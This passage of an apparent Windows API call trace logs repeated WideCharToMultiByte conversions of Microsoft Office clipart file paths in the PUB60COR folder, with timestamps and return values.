Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02282_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02312_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00005_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HTECH_01.MID", lpUsedDefaultChar=0x0) returned 69 [0104.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00046_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00118_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00204_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00233_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00343_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00915_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00919_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00956_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00957_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID", lpUsedDefaultChar=0x0) returned 69 [0104.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF", lpUsedDefaultChar=0x0) returned 69 [0104.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090777.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090779.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090781.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090783.WMF", 